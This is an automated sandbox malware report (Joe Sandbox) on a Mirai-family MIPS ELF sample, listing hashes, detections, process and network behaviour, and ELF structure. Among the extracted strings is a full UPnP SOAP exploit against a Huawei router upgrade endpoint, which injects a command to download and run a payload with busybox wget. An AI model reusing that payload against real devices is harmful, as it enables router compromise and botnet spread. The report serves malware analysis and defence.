Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
2.elf

Overview

General Information

Sample name:2.elf
Analysis ID:1586655
MD5:7d9e91dd4681915c48a4e2a64374ae40
SHA1:680653dbca313f33cf7403fa9dfec356d029b5ed
SHA256:b3d19e51d413b3f92a0f8944c6e3780d945ba711f36425ee9d3f9d4fd74627f3
Tags:elfuser-abuse_ch
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1586655
Start date and time:2025-01-09 13:06:06 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 59s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:2.elf
Detection:MAL
Classification:mal56.linELF@0/0@0/0
  • VT rate limit hit for: 2.elf
Command:/tmp/2.elf
PID:6279
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  • system is lnxubuntu20
  • 2.elf (PID: 6279, Parent: 6202, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/2.elf
  • dash New Fork (PID: 6295, Parent: 4331)
  • rm (PID: 6295, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.nz5nWXVWFy /tmp/tmp.D3T1jLdD7z /tmp/tmp.7Yo2uF4gfE
  • dash New Fork (PID: 6296, Parent: 4331)
  • rm (PID: 6296, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.nz5nWXVWFy /tmp/tmp.D3T1jLdD7z /tmp/tmp.7Yo2uF4gfE
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 2.elfAvira: detected
Source: 2.elfReversingLabs: Detection: 34%
Source: global trafficTCP traffic: 192.168.2.23:49856 -> 45.221.96.37:5555
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 45.221.96.37
Source: 2.elfString found in binary or memory: http://%d.%d.%d.%d/%s;
Source: 2.elfString found in binary or memory: http://%d.%d.%d.%d/2;
Source: 2.elf, 6279.1.00007f182445e000.00007f1824462000.rw-.sdmpString found in binary or memory: http://1/wget.sh
Source: 2.elf, 6279.1.00007f182445e000.00007f1824462000.rw-.sdmpString found in binary or memory: http://9/curl.sh
Source: 2.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 2.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33606
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 33606 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/*; /bin/busybox wget -g %d.%d.%d.%d -l /tmp/.vs -r /h; /bin/busybox chmod 777 /tmp/.vs; /tmp/.vs; sh /tmp/.vs)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sampleString containing 'busybox' found: %s%d%s<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/*; /bin/busybox wget -g %d.%d.%d.%d -l /tmp/.vs -r /h; /bin/busybox chmod 777 /tmp/.vs; /tmp/.vs; sh /tmp/.vs)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: ELF static info symbol of initial sample.symtab present: no
Source: /tmp/2.elf (PID: 6279)SIGKILL sent: pid: 2018, result: successfulJump to behavior
Source: classification engineClassification label: mal56.linELF@0/0@0/0
Source: /tmp/2.elf (PID: 6279)File opened: /proc/6279/statusJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/793/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1656/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1654/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/796/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1532/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/797/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/799/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1594/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1349/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1668/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1623/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/761/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1622/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/884/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1389/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1664/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1983/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/720/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1344/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1465/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1586/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/721/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1860/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1463/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1661/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/801/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/847/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1629/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1627/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1900/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/491/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1877/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/2009/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/772/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1633/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1599/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1632/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1477/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/774/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1476/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1872/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1475/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/777/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/658/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/936/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1639/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1638/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1809/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1494/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1890/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1888/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1601/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1886/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1489/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/785/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1642/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/2014/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1320/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/788/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/789/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/904/cmdlineJump to behavior
Source: /tmp/2.elf (PID: 6279)File opened: /proc/1648/cmdlineJump to behavior
Source: /usr/bin/dash (PID: 6295)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.nz5nWXVWFy /tmp/tmp.D3T1jLdD7z /tmp/tmp.7Yo2uF4gfEJump to behavior
Source: /usr/bin/dash (PID: 6296)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.nz5nWXVWFy /tmp/tmp.D3T1jLdD7z /tmp/tmp.7Yo2uF4gfEJump to behavior
Source: /tmp/2.elf (PID: 6279)Queries kernel information via 'uname': Jump to behavior
Source: 2.elf, 6279.1.0000559663104000.00005596631ac000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mipsel
Source: 2.elf, 6279.1.00007ffe5b41e000.00007ffe5b43f000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/2.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/2.elf
Source: 2.elf, 6279.1.0000559663104000.00005596631ac000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mipsel
Source: 2.elf, 6279.1.00007ffe5b41e000.00007ffe5b43f000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: 2.elf, 6279.1.00007ffe5b41e000.00007ffe5b43f000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsel
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
File Deletion
1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
SourceDetectionScannerLabelLink
2.elf34%ReversingLabsLinux.Trojan.Mirai
2.elf100%AviraEXP/ELF.Mirai.Hua.a
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://1/wget.sh2.elf, 6279.1.00007f182445e000.00007f1824462000.rw-.sdmpfalse
    high
    http://schemas.xmlsoap.org/soap/encoding/2.elffalse
      high
      http://%d.%d.%d.%d/%s;2.elffalse
        unknown
        http://9/curl.sh2.elf, 6279.1.00007f182445e000.00007f1824462000.rw-.sdmpfalse
          high
          http://%d.%d.%d.%d/2;2.elffalse
            high
            http://schemas.xmlsoap.org/soap/envelope/2.elffalse
              high
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              54.171.230.55
              unknownUnited States
              16509AMAZON-02USfalse
              109.202.202.202
              unknownSwitzerland
              13030INIT7CHfalse
              45.221.96.37
              unknownSouth Africa
              328543sun-asnSCfalse
              91.189.91.43
              unknownUnited Kingdom
              41231CANONICAL-ASGBfalse
              91.189.91.42
              unknownUnited Kingdom
              41231CANONICAL-ASGBfalse
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              54.171.230.55sst.elfGet hashmaliciousGafgytBrowse
                12.elfGet hashmaliciousUnknownBrowse
                  2.elfGet hashmaliciousUnknownBrowse
                    ssl.elfGet hashmaliciousGafgytBrowse
                      2.elfGet hashmaliciousUnknownBrowse
                        mips.elfGet hashmaliciousMiraiBrowse
                          12.elfGet hashmaliciousUnknownBrowse
                            fenty.arm4.elfGet hashmaliciousMiraiBrowse
                              Aqua.arm5.elfGet hashmaliciousUnknownBrowse
                                mips64.elfGet hashmaliciousUnknownBrowse
                                  109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                                  • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                                  45.221.96.37mips.elfGet hashmaliciousMiraiBrowse
                                    91.189.91.43arm5.elfGet hashmaliciousUnknownBrowse
                                      x864433.elfGet hashmaliciousUnknownBrowse
                                        sst.elfGet hashmaliciousGafgytBrowse
                                          ssx.elfGet hashmaliciousGafgytBrowse
                                            sss.elfGet hashmaliciousGafgytBrowse
                                              12.elfGet hashmaliciousUnknownBrowse
                                                Aqua.mpsl.elfGet hashmaliciousMiraiBrowse
                                                  2.elfGet hashmaliciousUnknownBrowse
                                                    main_ppc.elfGet hashmaliciousMiraiBrowse
                                                      a-r.m-5.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                        91.189.91.42arm5.elfGet hashmaliciousUnknownBrowse
                                                          x864433.elfGet hashmaliciousUnknownBrowse
                                                            sst.elfGet hashmaliciousGafgytBrowse
                                                              ssx.elfGet hashmaliciousGafgytBrowse
                                                                sss.elfGet hashmaliciousGafgytBrowse
                                                                  12.elfGet hashmaliciousUnknownBrowse
                                                                    Aqua.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                      2.elfGet hashmaliciousUnknownBrowse
                                                                        main_ppc.elfGet hashmaliciousMiraiBrowse
                                                                          a-r.m-5.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                            No context
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            CANONICAL-ASGBarm5.elfGet hashmaliciousUnknownBrowse
                                                                            • 91.189.91.42
                                                                            mips.elfGet hashmaliciousMiraiBrowse
                                                                            • 185.125.190.26
                                                                            x864433.elfGet hashmaliciousUnknownBrowse
                                                                            • 91.189.91.42
                                                                            sst.elfGet hashmaliciousGafgytBrowse
                                                                            • 91.189.91.42
                                                                            ssx.elfGet hashmaliciousGafgytBrowse
                                                                            • 91.189.91.42
                                                                            sss.elfGet hashmaliciousGafgytBrowse
                                                                            • 91.189.91.42
                                                                            12.elfGet hashmaliciousUnknownBrowse
                                                                            • 91.189.91.42
                                                                            Aqua.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                            • 91.189.91.42
                                                                            2.elfGet hashmaliciousUnknownBrowse
                                                                            • 91.189.91.42
                                                                            main_ppc.elfGet hashmaliciousMiraiBrowse
                                                                            • 91.189.91.42
                                                                            AMAZON-02USarm.elfGet hashmaliciousMiraiBrowse
                                                                            • 13.240.51.3
                                                                            arm7.elfGet hashmaliciousMiraiBrowse
                                                                            • 13.232.148.88
                                                                            ppc.elfGet hashmaliciousMiraiBrowse
                                                                            • 13.213.91.141
                                                                            spc.elfGet hashmaliciousMiraiBrowse
                                                                            • 18.189.238.55
                                                                            sh4.elfGet hashmaliciousMiraiBrowse
                                                                            • 13.57.133.73
                                                                            x86.elfGet hashmaliciousMiraiBrowse
                                                                            • 13.218.158.42
                                                                            sst.elfGet hashmaliciousGafgytBrowse
                                                                            • 54.171.230.55
                                                                            https://identity.thoughtspotlogin.cloud/Get hashmaliciousHTMLPhisherBrowse
                                                                            • 108.138.7.107
                                                                            https://booking.pathqerunknowns.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                            • 18.245.31.18
                                                                            colleague[1].htmGet hashmaliciousUnknownBrowse
                                                                            • 13.33.219.205
                                                                            INIT7CHarm5.elfGet hashmaliciousUnknownBrowse
                                                                            • 109.202.202.202
                                                                            x864433.elfGet hashmaliciousUnknownBrowse
                                                                            • 109.202.202.202
                                                                            sst.elfGet hashmaliciousGafgytBrowse
                                                                            • 109.202.202.202
                                                                            ssx.elfGet hashmaliciousGafgytBrowse
                                                                            • 109.202.202.202
                                                                            sss.elfGet hashmaliciousGafgytBrowse
                                                                            • 109.202.202.202
                                                                            12.elfGet hashmaliciousUnknownBrowse
                                                                            • 109.202.202.202
                                                                            Aqua.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                            • 109.202.202.202
                                                                            2.elfGet hashmaliciousUnknownBrowse
                                                                            • 109.202.202.202
                                                                            main_ppc.elfGet hashmaliciousMiraiBrowse
                                                                            • 109.202.202.202
                                                                            a-r.m-5.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                            • 109.202.202.202
                                                                            sun-asnSCmips.elfGet hashmaliciousMiraiBrowse
                                                                            • 45.221.96.37
                                                                            speedtest-cli.x86.elfGet hashmaliciousMiraiBrowse
                                                                            • 45.221.97.86
                                                                            speedtest-cli.x86_64.elfGet hashmaliciousUnknownBrowse
                                                                            • 45.221.97.86
                                                                            s8y4CBbFHW.elfGet hashmaliciousMiraiBrowse
                                                                            • 45.221.127.233
                                                                            hj3YCvtlg7.exeGet hashmaliciousFormBookBrowse
                                                                            • 102.134.40.151
                                                                            Purchase Order#23113.exeGet hashmaliciousFormBookBrowse
                                                                            • 102.134.40.151
                                                                            43ZYohKtbk.elfGet hashmaliciousMiraiBrowse
                                                                            • 45.221.118.203
                                                                            PROJECT-_SAUDI_ARAMCO_DRAWING_AND_SPECS.vbsGet hashmaliciousFormBookBrowse
                                                                            • 45.221.114.42
                                                                            2022-571-GLS.exeGet hashmaliciousFormBookBrowse
                                                                            • 45.221.114.43
                                                                            Swift.exeGet hashmaliciousFormBookBrowse
                                                                            • 45.221.114.43
                                                                            No context
                                                                            No context
                                                                            No created / dropped files found
                                                                            File type:ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                                                            Entropy (8bit):5.508333222969833
                                                                            TrID:
                                                                            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                            File name:2.elf
                                                                            File size:122'124 bytes
                                                                            MD5:7d9e91dd4681915c48a4e2a64374ae40
                                                                            SHA1:680653dbca313f33cf7403fa9dfec356d029b5ed
                                                                            SHA256:b3d19e51d413b3f92a0f8944c6e3780d945ba711f36425ee9d3f9d4fd74627f3
                                                                            SHA512:0ec27f0b53bdbeb4f224e38ec6b38f95d99a101bfddfa3da92c3d88c8504d300f1cb4dd64231c7fb0f28bdb0005a42382910f142efeec68b62b02f698bb92de5
                                                                            SSDEEP:3072:wDuJ3c3Amj8vzKg9J6qF+fkpXg+bx8XX:xYnYuKxpQ
                                                                            TLSH:08C3D91BBB620FFFD85ECD3B00E8174534DCA71A22697B397538D428F98A54A46D38B4
                                                                            File Content Preview:.ELF....................p.@.4...........4. ...(...............@...@.p...p.....................E...E.D....<..........Q.td...............................<<T.'!......'.......................<.T.'!.............9'.. ........................<.S.'!... .......0.9

                                                                            ELF header

                                                                            Class:ELF32
                                                                            Data:2's complement, little endian
                                                                            Version:1 (current)
                                                                            Machine:MIPS R3000
                                                                            Version Number:0x1
                                                                            Type:EXEC (Executable file)
                                                                            OS/ABI:UNIX - System V
                                                                            ABI Version:0
                                                                            Entry Point Address:0x400270
                                                                            Flags:0x1007
                                                                            ELF Header Size:52
                                                                            Program Header Offset:52
                                                                            Program Header Size:32
                                                                            Number of Program Headers:3
                                                                            Section Header Offset:121524
                                                                            Section Header Size:40
                                                                            Number of Section Headers:15
                                                                            Header String Table Index:14
                                                                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                            NULL0x00x00x00x00x0000
                                                                            .initPROGBITS0x4000940x940x8c0x00x6AX004
                                                                            .textPROGBITS0x4001200x1200x1a8800x00x6AX0016
                                                                            .finiPROGBITS0x41a9a00x1a9a00x5c0x00x6AX004
                                                                            .rodataPROGBITS0x41aa000x1aa000x1a700x00x2A0016
                                                                            .eh_framePROGBITS0x45d0000x1d0000x40x00x3WA004
                                                                            .ctorsPROGBITS0x45d0040x1d0040x80x00x3WA004
                                                                            .dtorsPROGBITS0x45d00c0x1d00c0x80x00x3WA004
                                                                            .data.rel.roPROGBITS0x45d0180x1d0180xc0x00x3WA004
                                                                            .dataPROGBITS0x45d0300x1d0300x4a80x00x3WA0016
                                                                            .gotPROGBITS0x45d4e00x1d4e00x5640x40x10000003WAp0016
                                                                            .sbssNOBITS0x45da440x1da440x1c0x00x10000003WAp004
                                                                            .bssNOBITS0x45da600x1da440x31b00x00x3WA0016
                                                                            .mdebug.abi32PROGBITS0x9a20x1da440x00x00x0001
                                                                            .shstrtabSTRTAB0x00x1da440x6e0x00x0001
                                                                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                            LOAD0x00x4000000x4000000x1c4700x1c4705.58970x5R E0x10000.init .text .fini .rodata
                                                                            LOAD0x1d0000x45d0000x45d0000xa440x3c105.24800x6RW 0x10000.eh_frame .ctors .dtors .data.rel.ro .data .got .sbss .bss
                                                                            GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 9, 2025 13:07:14.347843885 CET43928443192.168.2.2391.189.91.42
                                                                            Jan 9, 2025 13:07:16.522022009 CET4433360654.171.230.55192.168.2.23
                                                                            Jan 9, 2025 13:07:16.522181034 CET33606443192.168.2.2354.171.230.55
                                                                            Jan 9, 2025 13:07:16.527165890 CET4433360654.171.230.55192.168.2.23
                                                                            Jan 9, 2025 13:07:16.907468081 CET4251680192.168.2.23109.202.202.202
                                                                            Jan 9, 2025 13:07:19.723180056 CET42836443192.168.2.2391.189.91.43
                                                                            Jan 9, 2025 13:07:34.569319010 CET43928443192.168.2.2391.189.91.42
                                                                            Jan 9, 2025 13:07:46.855483055 CET42836443192.168.2.2391.189.91.43
                                                                            Jan 9, 2025 13:07:46.855631113 CET4251680192.168.2.23109.202.202.202
                                                                            Jan 9, 2025 13:08:15.523591995 CET43928443192.168.2.2391.189.91.42
                                                                            Jan 9, 2025 13:08:16.967041016 CET55554985645.221.96.37192.168.2.23
                                                                            Jan 9, 2025 13:08:16.967386961 CET498565555192.168.2.2345.221.96.37

                                                                            System Behavior

                                                                            Start time (UTC):12:07:11
                                                                            Start date (UTC):09/01/2025
                                                                            Path:/tmp/2.elf
                                                                            Arguments:/tmp/2.elf
                                                                            File size:5773336 bytes
                                                                            MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                            Start time (UTC):12:07:15
                                                                            Start date (UTC):09/01/2025
                                                                            Path:/usr/bin/dash
                                                                            Arguments:-
                                                                            File size:129816 bytes
                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                            Start time (UTC):12:07:15
                                                                            Start date (UTC):09/01/2025
                                                                            Path:/usr/bin/rm
                                                                            Arguments:rm -f /tmp/tmp.nz5nWXVWFy /tmp/tmp.D3T1jLdD7z /tmp/tmp.7Yo2uF4gfE
                                                                            File size:72056 bytes
                                                                            MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                            Start time (UTC):12:07:15
                                                                            Start date (UTC):09/01/2025
                                                                            Path:/usr/bin/dash
                                                                            Arguments:-
                                                                            File size:129816 bytes
                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                            Start time (UTC):12:07:15
                                                                            Start date (UTC):09/01/2025
                                                                            Path:/usr/bin/rm
                                                                            Arguments:rm -f /tmp/tmp.nz5nWXVWFy /tmp/tmp.D3T1jLdD7z /tmp/tmp.7Yo2uF4gfE
                                                                            File size:72056 bytes
                                                                            MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b